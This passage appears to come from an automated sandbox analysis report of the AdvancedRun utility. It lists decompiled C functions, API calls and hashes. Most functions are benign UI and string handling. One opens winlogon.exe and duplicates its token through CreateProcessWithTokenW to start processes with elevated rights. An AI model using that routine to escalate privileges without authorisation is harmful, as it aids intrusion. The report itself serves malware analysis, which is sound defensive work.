					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                  0x0040adf6
                                                                  0x0040adf8
                                                                  0x0040adfa
                                                                  0x0040adfb
                                                                  0x0040adfb
                                                                  0x0040ae02
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040ae04
                                                                  0x0040ae05
                                                                  0x0040ae6d
                                                                  0x0040ae6e
                                                                  0x0040ae73
                                                                  0x0040ae76
                                                                  0x0040ae7f
                                                                  0x0040ae83
                                                                  0x0040ae86
                                                                  0x00000000
                                                                  0x0040ae86
                                                                  0x0040ae8f
                                                                  0x0040ae0c
                                                                  0x0040ae10
                                                                  0x0040ae1e
                                                                  0x0040ae3b
                                                                  0x0040ae4a
                                                                  0x0040ae65
                                                                  0x0040ae7a
                                                                  0x0040ae7e
                                                                  0x0040ae67
                                                                  0x0040ae67
                                                                  0x0040ae68
                                                                  0x00000000
                                                                  0x0040ae68
                                                                  0x0040ae4c
                                                                  0x0040ae4c
                                                                  0x0040ae4e
                                                                  0x00000000
                                                                  0x0040ae4e
                                                                  0x0040ae3d
                                                                  0x0040ae3d
                                                                  0x0040ae3f
                                                                  0x0040ae53
                                                                  0x0040ae54
                                                                  0x0040ae59
                                                                  0x0040ae5c
                                                                  0x0040ae5c
                                                                  0x0040ae20
                                                                  0x0040ae28
                                                                  0x0040ae2d
                                                                  0x0040ae30
                                                                  0x0040ae30
                                                                  0x0040ae12
                                                                  0x0040ae12
                                                                  0x0040ae13
                                                                  0x00000000
                                                                  0x0040ae13
                                                                  0x00000000
                                                                  0x0040ae10

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                  • API String ID: 3510742995-3273207271
                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                  0x004041f9
                                                                  0x00404205
                                                                  0x00404208
                                                                  0x00404217
                                                                  0x0040421e
                                                                  0x00404236
                                                                  0x0040423f
                                                                  0x0040424a
                                                                  0x0040425f
                                                                  0x0040426b
                                                                  0x0040426e
                                                                  0x0040426e
                                                                  0x00404275
                                                                  0x004043be
                                                                  0x004043ce
                                                                  0x004043d0
                                                                  0x004043d3
                                                                  0x004043da
                                                                  0x004043da
                                                                  0x004043c0
                                                                  0x004043c3
                                                                  0x004043c3
                                                                  0x0040427b
                                                                  0x0040428c
                                                                  0x0040428f
                                                                  0x00404295
                                                                  0x004042a5
                                                                  0x004042b8
                                                                  0x004042cb
                                                                  0x004042de
                                                                  0x004042f1
                                                                  0x00404304
                                                                  0x00404317
                                                                  0x0040432a
                                                                  0x0040433d
                                                                  0x00404350
                                                                  0x00404363
                                                                  0x00404376
                                                                  0x00404389
                                                                  0x0040439c
                                                                  0x004043a4
                                                                  0x004043af
                                                                  0x004043b5
                                                                  0x004043b5
                                                                  0x004043f5

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040421E
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • BeginDeferWindowPos.USER32(0000000D), ref: 0040427D
                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                  • String ID: $
                                                                  • API String ID: 2142561256-3993045852
                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 55%
                                                                  			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                  0x00405b81
                                                                  0x00405b88
                                                                  0x00405b8a
                                                                  0x00405b8a
                                                                  0x00405b8f
                                                                  0x00405b96
                                                                  0x00405b9b
                                                                  0x00405bad
                                                                  0x00405bad
                                                                  0x00405b9d
                                                                  0x00405b9d
                                                                  0x00405ba8
                                                                  0x00405bab
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405bab
                                                                  0x00405be9
                                                                  0x00405be9
                                                                  0x00405baf
                                                                  0x00405bb1
                                                                  0x00405ce2
                                                                  0x00405ce2
                                                                  0x00405bb7
                                                                  0x00405bbd
                                                                  0x00405bf6
                                                                  0x00405c4b
                                                                  0x00405c4c
                                                                  0x00405c52
                                                                  0x00405c53
                                                                  0x00000000
                                                                  0x00405bf8
                                                                  0x00405c02
                                                                  0x00405c0e
                                                                  0x00405c13
                                                                  0x00405c18
                                                                  0x00405c2c
                                                                  0x00405c2e
                                                                  0x00405c3b
                                                                  0x00405c3c
                                                                  0x00405c42
                                                                  0x00000000
                                                                  0x00405c1a
                                                                  0x00405c25
                                                                  0x00405c2a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405c2a
                                                                  0x00405c18
                                                                  0x00405bbf
                                                                  0x00405bc0
                                                                  0x00405bcd
                                                                  0x00405bce
                                                                  0x00405bd7
                                                                  0x00405c58
                                                                  0x00405c5f
                                                                  0x00405c61
                                                                  0x00405c61
                                                                  0x00405c63
                                                                  0x00405cdb
                                                                  0x00405cdb
                                                                  0x00405c65
                                                                  0x00405c65
                                                                  0x00405c74
                                                                  0x00000000
                                                                  0x00405c84
                                                                  0x00405c8a
                                                                  0x00405c8d
                                                                  0x00405c99
                                                                  0x00405caf
                                                                  0x00405cbd
                                                                  0x00405cc8
                                                                  0x00405cd4
                                                                  0x00405cd9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405cd9
                                                                  0x00405c74
                                                                  0x00405c63
                                                                  0x00405ce6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                  • String ID: strings
                                                                  • API String ID: 3166385802-3030018805
                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 75%
                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                  0x00401e59
                                                                  0x00401e5c
                                                                  0x00401e64
                                                                  0x00401e67
                                                                  0x00401ef9
                                                                  0x00401e6d
                                                                  0x00401e70
                                                                  0x00401e76
                                                                  0x00401e79
                                                                  0x00401e7e
                                                                  0x00401e83
                                                                  0x00401e92
                                                                  0x00401e85
                                                                  0x00401e8e
                                                                  0x00401e8e
                                                                  0x00401e96
                                                                  0x00401ee6
                                                                  0x00401e98
                                                                  0x00401e9b
                                                                  0x00401e9e
                                                                  0x00401ea3
                                                                  0x00401ea8
                                                                  0x00401ebb
                                                                  0x00401eaa
                                                                  0x00401eb7
                                                                  0x00401eb7
                                                                  0x00401ebf
                                                                  0x00401ed3
                                                                  0x00401ec1
                                                                  0x00401ec7
                                                                  0x00401ec9
                                                                  0x00401ec9
                                                                  0x00401ed8
                                                                  0x00401ed8
                                                                  0x00401eeb
                                                                  0x00401eeb
                                                                  0x00401f01

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                  • String ID: winlogon.exe
                                                                  • API String ID: 1315556178-961692650
                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 79%
                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
				void* _t53;
				void* _t54;

				_t48 = 0;
				_v2060 = 0;
				memset( &_v2058, 0, 0x7fe);
				_t54 = _t53 + 0xc;
				 *__ebx = 0;
				_t52 = _a4 + 4;
				_v12 = 2;
				do {
					_push( *_t52);
					_t6 = _t52 - 4; // 0xe80040cb
					_push( *_t6);
					_push(L"%s (%s)");
					_push(0x400);
					_push( &_v2060);
					L0040B1EC();
					_t35 = wcslen( &_v2060);
					_v8 = _t35;
					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
					_t49 = _t48 + _v8 + 1;
					_t41 = wcslen( *_t52);
					_v8 = _t41;
					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
					_t54 = _t54 + 0x34;
					_t52 =  &(_t52[2]);
					_t23 =  &_v12;
					 *_t23 = _v12 - 1;
					_t48 = _t49 + _v8 + 1;
				} while ( *_t23 != 0);
				_t50 = __ebx + _t48 * 2;
				 *_t50 =  *_t50 & 0x00000000;
				_t50[1] = _t50[1] & 0x00000000;
				return __ebx;
			}















                                                                  0x00405241
                                                                  0x00405250
                                                                  0x00405257
                                                                  0x0040525f
                                                                  0x00405262
                                                                  0x00405265
                                                                  0x00405268
                                                                  0x0040526f
                                                                  0x0040526f
                                                                  0x00405277
                                                                  0x00405277
                                                                  0x0040527a
                                                                  0x0040527f
                                                                  0x00405284
                                                                  0x00405285
                                                                  0x00405291
                                                                  0x00405296
                                                                  0x004052a9
                                                                  0x004052b3
                                                                  0x004052b7
                                                                  0x004052bc
                                                                  0x004052ca
                                                                  0x004052d2
                                                                  0x004052d5
                                                                  0x004052d8
                                                                  0x004052d8
                                                                  0x004052db
                                                                  0x004052db
                                                                  0x004052e1
                                                                  0x004052e4
                                                                  0x004052e8
                                                                  0x004052f2

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                  • String ID: %s (%s)
                                                                  • API String ID: 3979103747-1363028141
                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                  0x00406157
                                                                  0x0040616d
                                                                  0x00406174
                                                                  0x0040617f
                                                                  0x00406185
                                                                  0x00406196
                                                                  0x0040619e
                                                                  0x004061b6
                                                                  0x004061bd
                                                                  0x004061d4
                                                                  0x004061da
                                                                  0x004061e0
                                                                  0x004061e5
                                                                  0x004061e6
                                                                  0x004061ef
                                                                  0x004061f9
                                                                  0x004061ff
                                                                  0x004061ef
                                                                  0x00406206

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                  • String ID: sysdatetimepick32
                                                                  • API String ID: 1028950076-4169760276
                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                  0x00404706
                                                                  0x00404714
                                                                  0x0040471c
                                                                  0x00404721
                                                                  0x0040472b
                                                                  0x00404733
                                                                  0x00404735
                                                                  0x00404735
                                                                  0x00404733
                                                                  0x00404751
                                                                  0x00404780
                                                                  0x00404753
                                                                  0x0040475e
                                                                  0x00404766
                                                                  0x0040476c
                                                                  0x00404770
                                                                  0x00404770
                                                                  0x0040478a

                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                  • wcslen.MSVCRT ref: 00404756
                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
